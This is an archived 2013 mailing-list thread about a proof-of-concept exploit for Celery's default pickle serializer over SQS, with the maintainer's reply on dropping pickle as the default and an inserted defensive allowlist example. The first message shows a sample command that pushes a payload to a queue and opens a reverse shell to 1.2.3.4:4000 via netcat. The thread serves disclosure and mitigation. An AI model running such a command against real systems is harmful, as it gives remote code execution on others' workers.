Andres Riancho | 6 Sep 14:08 2013

Celery python pickle exploit

List,

    Celery's documentation clearly states that using pickle for
serializing the information you send to the broker can be insecure and
gives safe alternatives. The main issue for me is that Celery's
default serializer is pickle, so I wrote a PoC tool that will exploit
this vulnerability [0][1].

    For this exploit to work celery needs to use SQS and the intruder
needs to have write access to the queue. Example run:

$ nimbostratus celery-pickle-exploit --access-key=... \
                  --secret-key=... --reverse 1.2.3.4:4000 \
                  --queue-name nimbostratus-celery --region ap-southeast-1
Starting celery-exploit
SQS queue nimbostratus-celery is vulnerable
We can write to the SQS queue.
Start a netcat to listen for connections at 1.2.3.4:4000 and press enter.

Sent payload to SQS, wait for the reverse connection!

    The most interesting part is the implementation which can be found here [1].

    I have no intentions to damage the Celery project, this is just a
PoC and as mentioned before this is a well documented vulnerability
with good and working fixes (different serializer, SSL signing of
messages).

[0] http://andresriancho.github.io/nimbostratus/
[1] https://github.com/andresriancho/nimbostratus/blob/master/core/celery_exploit/command.py

Ask Solem | 6 Sep 15:11 2013

Re: Celery python pickle exploit


On Sep 6, 2013, at 1:08 PM, Andres Riancho <andres.riancho@...> wrote:

> List,
> 
>    Celery's documentation clearly states that using pickle for
> serializing the information you send to the broker can be insecure and
> gives safe alternatives. The main issue for me is that Celery's
> default serializer is pickle, so I wrote a PoC tool that will exploit
> this vulnerability [0][1].

Andreas,

Thank you for this PoC, it's important to know that this can be a serious
issue if an attacker is able to send messages to the worker.

There isn't really anything we can do to fix this as this is how
pickle works for any project using it.

I have already decided that pickle will no longer be the default
serializer from Celery 3.2 (or 3.1 if the list feels that is ok, see below).
This means that users will need to educate themselves before enabling it.

The groundwork for that change is already complete:

- Kombu 3.0 no longer accepts pickle by default, instead you have
  to explicitly specify that you accept it using the accept argument to
  kombu.Consumer:

      consumer = kombu.Consumer(connection, accept=['pickle', 'json'])
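A stand-alone model of the accept allowlist described in the message above, added here as an example; it is not Kombu's or Celery's code and not part of the thread. The function names and sample messages are constructed for illustration; `application/x-python-serialize` is the content type Kombu uses for pickle bodies.

```python
import json
import pickle

class ContentDisallowed(Exception):
    """Raised when a message's content type is not in the consumer's accept list."""

# Decoders keyed by MIME type. "application/x-python-serialize" is the
# content type Kombu assigns to pickle bodies.
DECODERS = {
    "application/json": lambda body: json.loads(body.decode("utf-8")),
    "application/x-python-serialize": pickle.loads,
}

def decode_message(body, content_type, accept=("application/json",)):
    """Decode a broker message body only if its declared type is allowlisted."""
    # The check runs before any decoder, so a rejected pickle is never unpickled.
    if content_type not in accept:
        raise ContentDisallowed("refusing to decode %r" % content_type)
    decoder = DECODERS.get(content_type)
    if decoder is None:
        raise ContentDisallowed("no decoder for %r" % content_type)
    return decoder(body)

def triage(messages, accept=("application/json",)):
    """Return (decoded, rejected) for a batch of (body, content_type) pairs."""
    decoded, rejected = [], []
    for body, content_type in messages:
        try:
            decoded.append(decode_message(body, content_type, accept))
        except (ContentDisallowed, ValueError) as exc:
            rejected.append((content_type, str(exc)))
    return decoded, rejected

# Constructed sample messages (not captured traffic): a JSON task, a pickle
# task, and a pickle body mislabelled as JSON.
SAMPLE = [
    (json.dumps({"task": "tasks.add", "args": [2, 3]}).encode(), "application/json"),
    (pickle.dumps({"task": "tasks.add", "args": [2, 3]}), "application/x-python-serialize"),
    (pickle.dumps({"task": "tasks.add"}), "application/json"),
]

if __name__ == "__main__":
    ok, bad = triage(SAMPLE)
    print("decoded:", ok)
    for content_type, reason in bad:
        print("rejected:", content_type, "-", reason)
```

With the default JSON-only accept list, the mislabelled pickle body is also rejected, because the JSON decoder fails on it instead of the body reaching `pickle.loads`.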

Andres Riancho | 6 Sep 15:37 2013

Re: Celery python pickle exploit

Ask,

On Fri, Sep 6, 2013 at 10:11 AM, Ask Solem <ask@...> wrote:
>
> On Sep 6, 2013, at 1:08 PM, Andres Riancho <andres.riancho@...> wrote:
>
>> List,
>>
>>    Celery's documentation clearly states that using pickle for
>> serializing the information you send to the broker can be insecure and
>> gives safe alternatives. The main issue for me is that Celery's
>> default serializer is pickle, so I wrote a PoC tool that will exploit
>> this vulnerability [0][1].
>
>
> Andreas,
>
> Thank you for this PoC, it's important to know that this can be a serious
> issue if an attacker is able to send messages to the worker.
>
> There isn't really anything we can do to fix this as this is how
> pickle works for any project using it.

Agreed,

> I have already decided that pickle will no longer be the default
> serializer from Celery 3.2 (or 3.1 if the list feels that is ok, see below).
> This means that users will need to educate themselves before enabling it.
